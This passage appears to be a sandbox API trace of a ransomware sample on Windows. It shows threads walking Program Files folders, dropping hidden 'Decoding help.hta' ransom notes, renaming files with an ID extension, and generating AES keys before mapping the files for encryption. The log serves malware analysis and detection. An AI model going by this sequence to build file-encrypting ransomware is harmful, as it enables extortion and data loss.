Files\\System\\ado\\en-US\\msader15.dll.mui" [0058.374] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" [0058.374] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0058.374] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.375] FindNextFileW (in: hFindFile=0x5e2930, lpFindFileData=0x1ae1fd30 | out: lpFindFileData=0x1ae1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2a152a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb2a152a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4400, dwReserved0=0x0, dwReserved1=0x0, cFileName="msader15.dll.mui", cAlternateFileName="")) returned 0 [0058.375] FindClose (in: hFindFile=0x5e2930 | out: hFindFile=0x5e2930) returned 1 Thread: id = 711 os_tid = 0xf64 [0054.474] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\*.*", lpFindFileData=0x1af1fd30 | out: lpFindFileData=0x1af1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10f14880 [0058.675] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.675] FindNextFileW (in: hFindFile=0x10f14880, lpFindFileData=0x1af1fd30 | out: lpFindFileData=0x1af1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.675] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0058.675] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.675] FindNextFileW (in: hFindFile=0x10f14880, lpFindFileData=0x1af1fd30 | out: lpFindFileData=0x1af1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4c04500, ftCreationTime.dwHighDateTime=0x1c9db17, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xb4c04500, ftLastWriteTime.dwHighDateTime=0x1c9db17, nFileSizeHigh=0x0, nFileSizeLow=0x3948, dwReserved0=0x0, dwReserved1=0x0, cFileName="hxdsui.dll", cAlternateFileName="")) returned 1 [0058.675] lstrcpyW (in: lpString1=0x2515f9f0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\*.*" [0058.675] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\*.*") returned 70 [0058.675] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\Decoding help.hta" [0058.675] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1041\\decoding help.hta")) returned 0xffffffff [0058.676] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1041\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd14 [0058.676] WriteFile (in: hFile=0xd14, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1af1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1af1fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.677] CloseHandle (hObject=0xd14) returned 1 [0058.677] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.677] lstrcmpiW (lpString1="Decoding help.hta", lpString2="hxdsui.dll") returned -1 [0058.677] lstrlenW (lpString="hxdsui.dll") returned 10 [0058.677] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\*.*" [0058.677] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\*.*") returned 70 [0058.677] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\", lpString2="hxdsui.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\hxdsui.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\hxdsui.dll" [0058.677] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\hxdsui.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\hxdsui.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\hxdsui.dll" [0058.677] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\hxdsui.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.677] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1041\\hxdsui.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1041\\hxdsui.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.678] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1041\\hxdsui.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd14 [0058.678] CreateFileMappingA (hFile=0xd14, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xd18 [0058.678] CryptAcquireContextA (in: phProv=0x1af1fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1af1fcec*=0x10e280a8) returned 1 [0060.238] CryptGenKey (in: hProv=0x10e280a8, Algid=0x6610, dwFlags=0x1, phKey=0x1af1fce8 | out: phKey=0x1af1fce8*=0x10f148c0) returned 1 [0060.238] CryptExportKey (in: hKey=0x10f148c0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1af1fbe4, pdwDataLen=0x1af1fce4 | out: pbData=0x1af1fbe4*, pdwDataLen=0x1af1fce4*=0x2c) returned 1 [0060.238] MapViewOfFile (hFileMappingObject=0xd18, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3940) returned 0x4d70000 Thread: id = 712 os_tid = 0xf68 [0054.474] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\*.*", lpFindFileData=0x1b15fd30 | out: lpFindFileData=0x1b15fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10f14900 [0058.679] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.679] FindNextFileW (in: hFindFile=0x10f14900, lpFindFileData=0x1b15fd30 | out: lpFindFileData=0x1b15fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.679] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0058.679] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.679] FindNextFileW (in: hFindFile=0x10f14900, lpFindFileData=0x1b15fd30 | out: lpFindFileData=0x1b15fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17b1dc00, ftCreationTime.dwHighDateTime=0x1c9db18, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x17b1dc00, ftLastWriteTime.dwHighDateTime=0x1c9db18, nFileSizeHigh=0x0, nFileSizeLow=0x3948, dwReserved0=0x0, dwReserved1=0x0, cFileName="hxdsui.dll", cAlternateFileName="")) returned 1 [0058.679] lstrcpyW (in: lpString1=0x2515f9f0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\*.*" [0058.679] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\*.*") returned 70 [0058.679] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\Decoding help.hta" [0058.679] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1042\\decoding help.hta")) returned 0xffffffff [0058.680] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1042\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd24 [0058.680] WriteFile (in: hFile=0xd24, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1b15fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1b15fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.681] CloseHandle (hObject=0xd24) returned 1 [0058.681] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.681] lstrcmpiW (lpString1="Decoding help.hta", lpString2="hxdsui.dll") returned -1 [0058.681] lstrlenW (lpString="hxdsui.dll") returned 10 [0058.681] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\*.*" [0058.681] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\*.*") returned 70 [0058.681] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\", lpString2="hxdsui.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\hxdsui.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\hxdsui.dll" [0058.681] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\hxdsui.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\hxdsui.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\hxdsui.dll" [0058.682] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\hxdsui.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.682] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1042\\hxdsui.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1042\\hxdsui.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.682] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1042\\hxdsui.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd24 [0058.683] CreateFileMappingA (hFile=0xd24, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xd28 [0058.683] CryptAcquireContextA (in: phProv=0x1b15fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1b15fcec*=0x10e28130) returned 1 [0060.238] CryptGenKey (in: hProv=0x10e28130, Algid=0x6610, dwFlags=0x1, phKey=0x1b15fce8 | out: phKey=0x1b15fce8*=0x10f14940) returned 1 [0060.238] CryptExportKey (in: hKey=0x10f14940, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1b15fbe4, pdwDataLen=0x1b15fce4 | out: pbData=0x1b15fbe4*, pdwDataLen=0x1b15fce4*=0x2c) returned 1 [0060.238] MapViewOfFile (hFileMappingObject=0xd28, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3940) returned 0x4d80000 Thread: id = 713 os_tid = 0xf6c [0054.474] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*", lpFindFileData=0x1b25fd30 | out: lpFindFileData=0x1b25fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x235ff6a0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671170 [0054.475] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.475] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1b25fd30 | out: lpFindFileData=0x1b25fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x235ff6a0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.475] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.475] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.475] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1b25fd30 | out: lpFindFileData=0x1b25fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4a9e, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar.html", cAlternateFileName="")) returned 1 [0054.475] lstrcpyW (in: lpString1=0x1114bb50, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*" [0054.475] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*") returned 70 [0054.475] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\Decoding help.hta" [0054.475] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\decoding help.hta")) returned 0xffffffff [0054.475] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0054.475] WriteFile (in: hFile=0x484, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1b25fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1b25fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0055.479] CloseHandle (hObject=0x484) returned 1 [0058.375] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.375] lstrcmpiW (lpString1="Decoding help.hta", lpString2="calendar.html") returned 1 [0058.375] lstrlenW (lpString="calendar.html") returned 13 [0058.375] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*" [0058.375] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*") returned 70 [0058.375] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\", lpString2="calendar.html" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html" [0058.375] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html" [0058.375] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html.[ID]g9uZrLhJaygpwRm1[ID]" [0058.375] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\calendar.html"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\calendar.html.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.376] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1b25fd30 | out: lpFindFileData=0x1b25fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x235ff6a0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="css", cAlternateFileName="")) returned 1 [0058.376] lstrcmpW (lpString1=".", lpString2="css") returned -1 [0058.376] lstrcmpW (lpString1="..", lpString2="css") returned -1 [0058.376] lstrcmpiW (lpString1="windows", lpString2="css") returned 1 [0058.376] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*" [0058.376] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*") returned 70 [0058.376] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\", lpString2="css" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css" [0058.376] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\*.*" [0058.376] GlobalMemoryStatus (in: lpBuffer=0x1b25fd10 | out: lpBuffer=0x1b25fd10) [0058.376] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x247d5818, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x260 [0058.377] CloseHandle (hObject=0x260) returned 1 [0058.377] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1b25fd30 | out: lpFindFileData=0x1b25fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3f2, dwReserved0=0x0, dwReserved1=0x0, cFileName="gadget.xml", cAlternateFileName="")) returned 1 [0058.377] lstrcpyW (in: lpString1=0x24550388, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*" [0058.377] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*") returned 70 [0058.377] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows 